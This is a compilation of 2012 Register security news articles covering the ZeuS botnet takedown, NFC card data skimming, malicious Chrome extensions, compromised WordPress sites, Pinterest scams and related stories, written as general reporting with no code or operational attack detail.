STE WILLIAMS

Microsoft has confirmed that users of its instant messaging app will not be able to send each other links to popular torrent site The Pirate Bay, citing malware fears.

“We block instant messages if they contain malicious or spam URLs based on intelligence algorithms, third-party sources, and/or user complaints. Pirate Bay URLs were flagged by one or more of these and were consequently blocked,” Redmond told The Register in an emailed statement.

One can understand banning links to malware, even if that’s something that IM providers have been less than successful at managing in the past. But Redmond’s ban does rather raise the question as to why Pirate Bay has been singled out for blocking, when there are plenty of other sites to choose from, many with a much worse record for malware content than the Swedish site.

When asked about this, Microsoft declined to give any more details for their censorship choice. Certainly Pirate Bay is still the most popular torrent indexing site – even if, strictly speaking, it’s not indexing torrents any more. But no security vendors with whom El Reg has spoken says it’s any worse than others, and having such a large and comment-happy user base it actually provides more protection, since malware torrents are flagged-up earlier than on less-popular sites.

Torrent sites are certainly a security problem. Security vendors at the recent RSA 2012 conference repeatedly lambasted the technology for allowing users to bypass security perimeter controls and download malware directly, while grudgingly acknowledging that the technology has legitimate uses. The same arguments were being made five years ago about peer-to-peer technology.

There’s plenty of legitimate material for download using Pirate Bay’s feeds, and that too is being censored by Microsoft’s move to block all links, not just those that it knows contain malware. It would be difficult, expensive, and largely a waste of time to identify each link that contained malware and just ban those, since new ones can be created faster than they can be banned.

But in singling out this target, Redmond is opening itself up to claims that it is joining the global jihad against Pirate Bay – certainly its lack of explanation for targeting just that the site and not others indicates this. The owners of the Pirate Bay are still enmeshed in legal problems, and the group appears to be willing to consider highly unorthodox measures to keep the service up and running – and this latest move will not help the site’s operators. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/03/26/microsoft_censors_pirate_bay_im/

Security expert Bruce Schneier was been banned at the last minute from testifying in front of congress on the efficacy – or otherwise – of the US Transportation Security Administration’s (TSA) much-maligned perv scanners.

Schneier is a long-time critic of the TSA’s policies for screening travelers, and was formally invited to appear before the House Committee on Oversight and Government Reform and the Committee on Transportation and Infrastructure hearings. However, the TSA objected to his presence because he is currently involved in a legal case over the use of said scanners in US airports.

“I was looking forward to sitting next to a TSA person and challenging some of their statements. That would have been interesting,” Schneier told The Register. “The request to appear came from the committee itself, because they’d been reading my stuff on this and thought it would be interesting.”

Schneier, who is currently involved in an Economist debate on just this issue, has criticized the TSA’s procedures as “security theater“, designed to give the appearance of security without actually being effective. He has pointed out that the scanners are easily defeated, and that since people who do have items are merely forced to give them up and sent on their way, terrorists simply need to send enough people through the systems until one of them succeeds.

This isn’t the first time the TSA has been less than willing to have itself subject to anything like the same scrutiny that aircraft passengers are routinely put through. Last year they ducked out of similar hearings at the last minute, apparently because they didn’t want to sit next to representatives from the Electronic Privacy Information Center (EPIC).

The use of the perv scanners is highly controversial. The TSA has spent millions of dollars to buy them, and the industry hired ex–Homeland Security supremo Michael Chertoff as a lobbyist to push the technology. However, there have been numerous examples of people claiming to be able to beat the scanners, concerns about the health implications of scanning, and the so-called “homosexual” pat-downs introduced to encourage people to use them caused a national day of protest.

There are currently several ongoing legal cases against the scanners, including one recent case in which, it is claimed, attractive female subjects were being repeatedly ordered to use the devices. Personal airport searches have to be performed by a member of the same sex as the target, but no such rules are in place for operators of the scanners.

“I think the TSA has really painted themselves into a corner over this,” Schneier told us. “They’ve said the scanners were absolutely necessary for security, and made the pat downs you can have as an alternatives so unpleasant. It’s going to be really hard for them to back down, if indeed they can.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/03/26/tsa_schneier_congress_block/

A Microsoft-led operation resulted in the takedown of key servers associated with the infamous ZeuS and SpyEye banking Trojan botnets on Friday.

Months of investigation culminated in the coordinated seizure of command-and-control servers associated with the botnets and hosted in Scranton, Pennsylvania, and Lombard, Illinois.

The takedown came after Microsoft filed suit against 39 unnamed parties on Monday (16 March) asking for permission to sever the command-and-control structures of these ZeuS botnets. The action follows the same tactics as previous successful takedowns of Waledac, Rustock and Kelihos spam-distribution botnet networks.

In a statement, Microsoft described the ZeuS takedown as its most complex to date. It said the action had the “limited and achievable” aim of disrupting the operations of ZeuS-related cybercrime operations rather than decapitating a zombie network, as in previous operations.

Cybercriminals have built hundreds of botnets using variants of ZeuS malware. For this action – codenamed Operation b71 – we focused on botnets using ZeuS, SpyEye and Ice-IX variants of the ZeuS family of malware, known to cause the most public harm and which experts believe are responsible for nearly half a billion dollars in damages.

Due to the unique complexity of these particular targets, unlike our prior botnet takedown operations, the goal here was not the permanent shutdown of all impacted targets. Rather, our goal was a strategic disruption of operations to mitigate the threat in order to cause long-term damage to the cybercriminal organization that relies on these botnets for illicit gain.

ZeuS and SpyEye are essentially cybercrime toolkits for the creation of customised banking Trojans. These crimeware kits sell for anywhere between $700 to $15,000, depending on the version and features of the kit. Many cybercrime gangs use ZeuS as the launchpad for banking fraud so there are many different zombie networks at play.

Microsoft has detected more than 13 million suspected infections of ZeuS and SpyEye-related malware worldwide, with more than 3 million in the United States alone.

Friday’s takedown action follows months of work by investigators at Microsoft in co-operation with officers from the Financial Services – Information Sharing and Analysis Center (FS-ISAC) and the National Automated Clearing House Association, the US electronic payments association. Net security firm F-Secure is credited with providing a major help in analysing the malware that feature in the operation. US Federal Marshals accompanied investigators in raids on two hosting firms, during which servers was seized for subsequent analysis. Microsoft’s statement fails to clarify this point but other reports strongly suggest the hosting firms involved were unwittingly playing host the key infrastructure resources associated with the ZeuS botnets rather than acting as accomplices in cybercrime.

The operations resulted in the dismantling of two IP addresses behind the ZeuS ‘command-and-control’ structure. Microsoft has started monitoring 800 domains secured in the operation, helping it to identify thousands of ZeuS-infected computers. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/03/26/zeus_botnet_takedown/

Channel 4 News has found out that pay-by-wave phones are compatible with pay-by-wave cards, and wants something done about it, but it’s web bazaar Amazon that’s lacking basic security.

The investigation, which was carried out by viaForensics at Channel 4’s behest, discovered that one can lift the credit card number, expiry date and customer name from a Barclaycard-issued Visa card, which wouldn’t be such a big deal if Channel 4 News hadn’t also discovered that Amazon isn’t doing the basic checking which would prevent such details being used fraud.

But Channel 4 pins the blame firmly on Barclaycard, claiming:

“The government has urged Barclays to consider recalling up to 13 million credit and debit cards” after “we found the cards can also be read by mobile phones”.

That shouldn’t be surprising as the cards concerned conform to the NFC (Near-Field Communications) standard, as do modern phones, and there’s an expectation that NFC phones will be able to double up as cheap Point Of Sale terminals in some instances. What Channel 4 News discovered was that some cards give up the customer’s name as well as the other details, and that Amazon’s security procedures are lamentable to say the least.

Online retailers are supposed to check the CVV2 code, the three-digit number on the back of the card, as well as confirming the cardholder’s address. They aren’t allowed to store the CVV2 (in fear of compromised servers) so to enable one-click ordering retailers like Amazon only ask for the code the first time the card is used and then trust the buyer.

Only it seems that Amazon isn’t even bothering to check the CVV2 the first time, so Channel 4 News was able to set up a new account and make purchases on that account using only the card number, expiry data, and name.

ViaForensics, which provided the tech for the probe, is less sensationalist about the data recovered: “Typically this would not be enough information to perform ‘cardholder not present’ transactions because retailers require the CVV2 code printed on the back, and a valid address”, but not in the case of Amazon obviously.

On the other hand, the Barclaycards shouldn’t have been sharing punters’ names, but a straw poll of Visa-backed Barclaycards around El Reg Towers showed they were only prepared to share card number and expiry data as recommended by the EMV specifications, so it’s far from clear what proportion of cards are over-sharing.

Any losses incurred by this kind of fraud would be refunded by Barclaycard, once the customer has jumped through the required hoops, and Amazon will pay a transaction rate that reflects the probability of such fraud. But the reflection it casts on the security of proximity payments will be harder to shake off.

Using a mobile phone to make payments is a good deal more secure: most Android phones don’t even power-up the NFC component unless the screen is on. However, consumers are very conservative and won’t warm to the technology if it’s demonstrably vulnerable. Electronic payments involve a chain of participants, and the failure of any link is perceived as a failure of the entire system; proximity payment systems aren’t nearly robust enough to take that kind of confidence knock.

Channel 4 News did a fine job in exposing a weak link in the chain, and one which needs to be fixed, but as is so often the case in security matters it’s the processes that are flawed, not the technology, even if it does make the better headline. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/03/26/nfc_security_amazon/

Two local men have been arrested after an online referendum organised by Hong Kong university to poll citizens on their choice of chief executive was disabled in an apparent denial of service attack.

Broadcaster Radio Television Hong Kong (RTHK) reported that the men, aged 17 and 28, were arrested at the weekend after the online poll was disrupted for a large part of Friday and some of Saturday.

Hong Kong university’s Public Opinion Program set up the ‘Civic Referendum Project’ because people who live in the Special Administrative Region (SAR) of China are not given the power to vote directly for their CEO – effectively the head of the Hong Kong government.

Instead a pre-selected 1,200-strong Election Committee full of pro-Beijing businessmen is given the task, a fact that is angering a growing number of democracy-hungry locals, especially given that this year’s candidates were universally unpopular and tainted with scandal.

AFP reported that Hong Kong uni’s back-end systems buckled under the huge volume of traffic.

The system has been very busy,” Robert Chung, director of the university’s program, apparently told reporters. “We suspect it is under systematic attack as there are more than one million clicks on our system every second.”

Chung was reportedly reticent about the potential motive for the attack but it is well known that the Chinese authorities are not a massive fan of free speech and probably viewed the referendum as undermining the result of the real vote – the outcome of which Beijing basically controls.

In any case it has always been nigh on impossible to directly link the Chinese government with specific cyber attacks, although it is widely suspected that it allows so-called patriotic hackers and even more obvious cyber criminals to commit offences as long as they are in the national interest.

A report by US defence contractor Northropp Grumman earlier this month alleged that China’s military relies on academia and the commercial IT sector to boost its RD efforts in information warfare.

In the end only around 220,000 Hong Kong-ers were able to take part in the poll out of a population of seven million, with a majority of over 50 per cent spoiling their papers to signify that they supported ‘none of the above’ candidates.

Votes could be cast online, via SMS or a smartphone app, as well as in several polling stations in the region. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/03/26/hong_kong_vote_hack/

Child abusers are latching onto new methods to distribute paedophilic material online, according to an annual report by the Internet Watch Foundation.

The study, published on Monday, reports that paedophiles are ‘disguising’ websites to appear as if they host only legitimate content. However, if an internet user follows a particular digital path they will be able to view vile images and videos of children being sexually abused.

The technique, which has many legitimate applications, is also widely used by paedophiles. IWF experts encountered the tactic nearly 600 times last year. None of the websites in question were hosted in the UK.

Susie Hargreaves, IWF chief executive, explained: “We received reports to our Hotline by online users who have stumbled across these sites. They pose challenges because when the website is accessed directly, only legal content appears.

“However, the reports we receive by the public can be quite detailed and these reporters were sure of what they had seen. Our analysts investigated further and discovered a legitimate web development technique was being used to disguise the website from all those who had not followed a particular digital path to access it.

“Clearly, ordinary online users had still found this content and we’ve been working with analysts in our sister hotlines and with our members to tackle this issue.”

Child abuse portals are using the technique because it masks the true purpose of a site from those who have not followed the correct page path. Secondly, the approach allows commercial child sexual abuse peddlers to use services from legitimate hosting firms.

The IWF also reports that the hosting industry is getting faster at removing paedophile material from its networks. The tiny amount of abusive content hosted on UK networks is typically removed within 60 minutes of notification.

Two years ago the IWF challenged itself to speed up the removal of child sexual abuse content hosted outside the UK. Such content is more likely to feature younger children, and more likely to show the most depraved content featuring sexual activity between adults and children, rape and sexual torture.

Around half of all child sexual abuse images and videos hosted outside of the UK are removed within 10 days. In 2008 they typically stayed available for more than a month. The report shows that IWF members are able to remove child sexual abuse content around 40 per cent more quickly than non-members. In cases where child sexual abuse content is hosted by an IWF member, most (85 per cent) is removed within 10 days and almost all (95 per cent) is removed within 13 days.

Identifying new victims

IWF analysts are able to identify new images of sexual abuse and subsequently alert police to youngsters who may not be known to them but are potentially at immediate risk. Three children who were being sexually abused were rescued during 2011 thanks to information sharing between the IWF and the the Child Exploitation and Online Protection (CEOP) Centre.

One child was traced to Sweden, where she was being abused by a relative who subsequently uploaded images of the abuse online. Another two at-risk children were traced to addressees within the UK and also rescued from their abusers.

In total seven children have been rescued since information-sharing arrangements between the IWF and CEOP were put in place two years ago. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/03/26/iwf_report/

Kaspersky Lab has found malware-laden Chrome extensions, along with a criminal gang playing cat and mouse with Google by releasing several variations of its wares.

The attacks manifest as suggestions to download Facebook apps. Those apps are, alas, not real. Instead they are malware and, in one case, a malware-laden Chrome extension hosted in Google’s very own Chrome Web Store.

The malware pretends to be a Flash Player installer but instead downloads a Trojan which writes messages to a victim’s Facebook profile and automatically Likes certain pages.

The former activity contains an alluring message suggesting your Friends download the same malware. The auto-Liking behaviour is part of a pay-per-Like scheme that helps the criminals to cash in.

Variations on this attack have been around for a few weeks now, Kaspersky says, but is so far largely confined to Brazil and other Portuguese-speaking nations.

Google is pulling the malware as fast as the criminals can sneak new variants into the Chrome Web Store.

Researcher Fabio Assolini suggests: “Be careful when using Facebook. And think twice before installing a Google Chrome extension.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/03/25/chrome_web_store_malware_hijacks_facebook_profiles/

Security experts testifying at hearings held by the US Senate Armed Services Committee on cybersecurity have warned that maintaining a perimeter to keep out spies is unsupportable, and that the US should assume that its networks have already been fully penetrated.

“We’ve got the wrong mental model here,” said Dr. James Peery, director of the Information Systems Analysis Center at Sandia National Laboratories. “I don’t think that we would think that we could keep spies out of our country. We’ve got this model for cyber that says, ‘We’re going to develop a system where we’re not attacked.’ I think we have to go to a model where we assume that the adversary is in our networks. It’s on our machines, and we’ve got to operate anyway.”

The committee heard that the US Department of Defense (DoD) operates over 15,000 networks with around seven million computing devices, and protecting them against hacking was virtually impossible, particularly in light of the increasing complexity of both the devices and the software that runs on them.

The commercial software industry has, of course, realized that the old idea of a perimeter defense is increasingly useless, and groups such as the Jericho Forum have been working on systems to protect data, rather than network boundaries for many years. Such principles might be antithetical to the military mind, but Dr. Kaigham Gabriel, current head of the DARPA, said that the cost of perimeter control would be huge and most likely ineffective anyway.

“Modern operations will demand the effective use of cyber, kinetic, and combined cyber and kinetic means,” he suggested. “The shelf-life of cyber tools and capabilities is short – sometimes measured in days. To a greater degree than in other areas of Defense, cybersecurity solutions require that DoD develops the ability to build quickly, at scale, and over a broad range of capabilities.”

Cyber arms races are all well and good, but the head of research at the National Security Agency (NSA) Dr. Michael Wertheimer warned that the US is also facing an increasing intelligence gap, as not enough citizens have the skills of online defense. In 2010 there were just 726 computer science PhDs awarded to US citizens, and only 64 of them signed up for government service.

The open session of the committee hearings can be viewed here.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/03/24/congress_dod_pwned/

Malware-flingers are taking advantage of vulnerable WordPress sites as part of an attack ultimately designed to spread an information-stealing botnet agent.

Cybercrooks begin the attack by planting malicious scripts on vulnerable sites. Prospective marks are then lured to compromised sites via spammed messages that purport to come from known legitimate sources including Better Business Bureau and LinkedIn, among others. The crooks use social engineering tactics to entice unsuspecting users to click the link found in the email.

Clicking on links in these spam messages points surfers towards compromised WordPress sites – and not the legitimate sites users might have expected to visit. Redirection scripts on compromised sites expose surfers to a variety of drive-by download attacks that attempt to take advantage of well-known (and already patched) Adobe Reader and Windows flaws to drop malware onto poorly secured Windows PCs.

The attack, which uses the infamous Blackhole Exploit kit, is geared towards spreading the Cridex Trojan, an information-stealing strain of malware. Cridex established a botnet using compromised Windows boxen, as explained in a write-up by Trend Micro.

“This malware intercepts browser requests and changes the displayed content according to the configuration, written by the administrator of the botnet,” Trend explains. “This way, cybercriminals can trick users into entering valuable information without raising suspicion. It was also found to generate several random domains using domain generating algorithms (DGA).”

A full write-up of the attack, complete with screenshots of spam samples that have featured in the attack, can be found in a blog post by Trend Micro here.

More on the Cridex Trojan can be found in an earlier blog post by M86 Security here.

Earlier this month, Websense warned that vulnerable WordPress content management systems are being abused to promote fake anti-virus (AKA scareware) scams.

“The majority of targets are websites hosted by the WordPress content management system, it said. “At the time of writing, more than 200,000 web pages have been compromised, amounting to close to 30,000 unique websites (hosts). The injection hijacks visitors to the compromised sites and redirects them to rogue AV sites that attempt to trick them into downloading and installing a Trojan onto their computer.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/03/23/wordpress_vuln_botnet_exploit/

Cybercrooks have latched on the success of social networking site Pinterest by launching a variety of money-making scams.

Just like Facebook before it, Pinterest has become a haven for survey scams. Would-be marks are invited to complete surveys under the pretext that they might win an iPad or obtain a discount voucher. In reality, they end up revealing personal information to unscrupulous marketing firms or (worse) signing up for mobile phone subscription services of dubious utility, such as daily horoscopes. In some cases these scams are even used to distribute malware.

Trend Micro reports that fake Starbucks discount card offers have become a particularly prevalent lure for survey scams on Pinterest.

Miscreants who promote survey scams profit through affiliate marketing funds maintained by dodgy marketing outfits. However, some lead to a cost-per-action (CPA) based network, in which case each successful sales conversion makes the scammer between $1 and $64 (£0.63 to £40), according to Symantec. The security firm speculates that a scammer might be earning a few hundred dollars each day from these scams.

Pinterest, a pinboard-style image- and photo-sharing social networking website, has experienced huge growth since its launch in 2010. These developments have not gone unnoticed among the ranks of cyber criminals and black hat marketers. Black Hat Tools, a digital underground site that built its reputation by selling suites for spamming Twitter and Facebook, has begun offering tools for spamming Pinterest. The charmingly titled “Pinterest bot collection” (presumably straight off the runways at Paris fashion shows) can be yours for $249, mobile security specialist Cloudmark reports.

Andrew Conway, lead software engineer at Cloudmark, commented: “In many ways, the survival of Pinterest largely depends on how successfully it can control these inevitable spam attacks and furthermore, how effectively it can respond to those criminals who are currently testing their defences.”

A Pinterest spokesperson said:

As a growing service, Pinterest is not immune to challenges faced by sites across the web including spam. However, it is a tremendous priority for us to quickly address them. Our engineers are actively working to manage issues as they arise and are revisiting the nature of public feeds on the site to make it harder for fake or harmful content to get into them.

®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/03/23/pinterest_attracts_scammers/